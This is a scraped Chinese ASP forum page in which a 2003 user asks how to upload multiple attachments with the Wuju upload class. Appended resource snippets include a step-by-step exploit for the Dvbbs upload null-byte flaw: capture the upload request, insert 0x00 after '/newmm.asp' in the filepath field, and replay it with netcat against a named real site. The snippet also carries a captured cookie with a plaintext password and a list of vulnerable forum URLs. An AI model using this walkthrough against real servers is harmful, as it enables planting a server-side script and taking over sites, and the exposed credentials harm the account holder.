社区
ASP
帖子详情
如何一次上传多个文件,我用的梁无惧的上传类。在线等
zhljsdly
2003-10-21 08:42:53
如题
我现在想做个类似“邮件”的系统,但是邮件要求一次能上传多个附件啊
这个类能实现吗?
...全文
65
8
打赏
收藏
如何一次上传多个文件,我用的梁无惧的上传类。在线等
如题 我现在想做个类似“邮件”的系统,但是邮件要求一次能上传多个附件啊 这个类能实现吗?
复制链接
扫一扫
分享
转发到动态
举报
写回复
配置赞助广告
用AI写文章
8 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
zhljsdly
2003-12-31
打赏
举报
回复
结贴了 还是用组件方便
zhljsdly
2003-10-21
打赏
举报
回复
再来up一下
icerainfly
2003-10-21
打赏
举报
回复
up
zhljsdly
2003-10-21
打赏
举报
回复
那我要在数据库里的表要怎么建呢?我不知道人家要上传几个附件啊
Ellen1124
2003-10-21
打赏
举报
回复
梁无惧的上传类1.2版本http://www.cgknife.com/yjlrb/upfile.rar
icerainfly
2003-10-21
打赏
举报
回复
我也想要梁无惧的上传类,哪里提供下载?
zhljsdly
2003-10-21
打赏
举报
回复
复杂不?^_^
lqflsh
2003-10-21
打赏
举报
回复
可以,你看动网的上传就是无惧上传。
无惧
上传
类
Version V1.2
自从用ASP来编写网站,就无时无刻想找一种兼容性强,使用方便的
上传
方法,用过很多的无 组件
上传
方法,但是都存在使用不方便,兼容性差,速度慢等的问题。终于在2003年的元旦里,想 到了可以让
上传
文件
达到最快的方法,经过10天的努力,整整10个版本的版本的更新,终于完成了这一个“
无惧
上传
类
V1.0”,这个版本与其它的
上传
类
或方法相比,具有速度快,兼容性强, 使用方便等特点。
无惧
上传
类
- UpFile_Class V1.2
自从用ASP来编写网站,就无时无刻想找一种兼容性强,使用方便的
上传
方法,用过很多的无 组件
上传
方法,但是都存在使用不方便,兼容性差,速度慢等的问题。终于在2003年的元旦里,想 到了可以让
上传
文件
达到最快的方法,经过10天的努力,整整10个版本的版本的更新,终于完成了这一个“
无惧
上传
类
V1.0”,这个版本与其它的
上传
类
或方法相比,具有速度快,兼容性强, 使用方便等特点。
无惧
无组件
上传
.rar
自从用ASP来编写网站,就无时无刻想找一种兼容性强,使用方便的
上传
方法,用过很多的无 组件
上传
方法,但是都存在使用不方便,兼容性差,速度慢等的问题。终于在2003年的元旦里,想 到了可以让
上传
文件
达到最快的方法,经过10天的努力,整整10个版本的版本的更新,终于完成了第一个“
无惧
上传
类
V1.0”,这个版本与其它的
上传
类
或方法相比,具有速度快,兼容性强, 使用方便等特点。
先锋无组件
上传
类
(
无惧
2.0杜绝
上传
漏洞修改版) v2004
上传
漏洞终结篇 一、写在前面 ***这个
上传
漏洞利用的原理只是针对form格式
上传
的asp和php脚本*** NC(Netcat) 用于提交数据包 DOS界面下运行: NC -vv www.***.com 80<1.txt -vv: 回显 80: www端口 1.txt: 就是你要发送的数据包 (更多使用方法请查看本区的帖子) WSE(WSockExpert) 对本机端口的监视,抓取IE提交的数据包 (不会用的就自己到网上搜资料N多) 二、漏洞原理 下面例子假设的前提 www主机: www.***.com; bbs路径 : /bbs/ 漏洞源于对动网
上传
文件
的研究,建议有一定编程经验的 看看Dvbbs的upfile.asp
文件
,没有必要全部看懂 upfile是通过生成一个form表
上传
,如下
用到的变量: filepath 默认值uploadface 属性hiden act 默认值upload 属性hiden file1 就是你要传的那个
文件
关键是 filepath 这个变量! 默认情况下我们的
文件
上传
到www.***.com/bbs/uploadface/
文件
是用你的
上传
时间命名的,就是upfile里的这一句 FileName=FormPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&FileExt ------------------------------------------------------------------------- 我们知道计算机里面的数据是一"\0"为标致的用过C语言的都知道 char data[]="bbs" 这个data数组长度是4: b b s \0 如果我们构造filepath如下,会怎么样呢? filepath="/newmm.asp\0" 我们在2004.09.24.08.24传的
文件
就会发生变化 没有改时: http://www.***.com/bbs/uploadface/200409240824.jpg 用我们构造的filepath时: http://www.***.com/newmm.asp\0/200409240824.jpg 这样当服务器接收filepath数据时,检测到newmm.asp后面的\0 就理解为filepath的数据就结束了 这样我们
上传
的
文件
,比如c:\1.asp 就保存成: http://www.***.com/newmm.asp 三、后期补充 漏洞公布以后很多网站做了相应的处理,但是对于filepath的过滤和处理都不行 有很多网站只是加了N个hiden属性的变量对付网上公布的upfile.exe就是那个
上传
漏洞利用工具或者filepath变量利用工具(老兵的)...但是最基本的没改啊。。 而且很对网站的插件里有
类
似的漏洞,我要说的不要依赖哪些专门的工具 自己改WSE抓到的包里的filepath变量,然后在用NC提交。。。 就算他加N个hiden变量也于事无补。 当然,如果对filepath做了很严格的过滤的话我们的这些理论就将宣告终结 就是我们的新理论诞生的时候! 四、漏洞列表 http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5369http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5530http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5531http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5693http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5731http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5746 监听外部主机 NC [-options] hostname port[s] [ports] ... 监听本地主机 NC -l -p port [options] [hostname] [port] options: -d detach from console, stealth mode -e prog inbound program to exec [dangerous!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h this cruft -i secs delay interval for lines sent, ports scanned -l listen mode, for inbound connects -L listen harder, re-listen on socket close -n numeric-only IP addresses, no DNS -o file hex dump of traffic -p port local port number -r randomize local and remote ports -s addr local source address -t answer TELNET negotiation -u UDP mode -v verbose [use twice to be more verbose] -w secs timeout for connects and final net reads -z zero-I/O mode [used for scanning] port numbers can be individual or ranges: m-n [inclusive] 详细实例: --------------------------------------------------------------------------------- 一、WSE抓包结果(存到1.txt里): POST /bbs/upPhoto/upfile.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://www.xin126.com/bbs/upPhoto/upload.asp Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7d423a138d0278 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) Host: www.xin126.com Content-Length: 1969 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDACCCCDCS=NJHCPHPALBCANKOBECHKJANF; isCome=1; GAMVANCOOKIES=1; regTime=2004%2D9%2D24+3%3A39%3A37; username=szjwwwww; pass=5211314; dl=0; userID=62; ltStyle=0; loginTry=1; userPass=eb03f6c72908fd84 -----------------------------7d423a138d0278 Content-Disposition: form-data; name="filepath" ../medias/myPhoto/ -----------------------------7d423a138d0278 ... ...
上传
-----------------------------7d423a138d0278-- --------------------------------------------------------------------------------- 二、UltraEdit打开1.txt改数据: ...... -----------------------------7d423a138d0278 Content-Disposition: form-data; name="filepath" /newmm.asp█ <===这个黑色代表一个空格是 0x20,改成0x00就可以了 ...... --------------------------------------------------------------------------------- 三、重新计算cookies长度,然后nc提交 Nc -vv www.xin126.com 80 <1.txt UltraEdit是一个16位编辑器网上可以下载得到 我们主要用来写那个结束标致: \0 ====>16位表示:0x00或者00H 其实你改的时候就直接再filepath的结尾处加个00就OK了 计算cookies长度===>你把fillepath改了之后、肯定是或+或—cookies的长度变了 ...... Host: www.xin126.com Content-Length: 1969 <======就是这个 Connection: Keep-Alive Cache-Control: no-cache ...... 计算会吧?一个字母、数字就是1 对于
上传
漏洞提出的解决思路:(仅供参考) 1、一般的
上传
是把
上传
路径作为一个变量来处理 ===>我们的对策就是把filepath变成常量。。。 这个方法是目前最有效的(我认为的) 2、加强对于\0的处理,原来我们是读到这里就结束 我们继续读直道下一个变量开始的地方,处理就OK了
可以
上传
多个
图片的ASP程序
大部分的ASP
上传
程序都是一个个长传到服务器上,感觉繁琐。所以我自己编写了一个简单易用可以
上传
多个
图片的小程序,此小程序多数用于企业网站建设的产品图片或图片预览切换之
类
的。简单实用。 此代码在
无惧
上传
类
V1.2基础上修改,实现无限多图片
上传
,支持显示
上传
后的
文件
名,实时把图片插入编辑框。 test.asp 为测试
文件
。
ASP
28,390
社区成员
357,068
社区内容
发帖
与我相关
我的任务
ASP
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
复制链接
扫一扫
分享
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章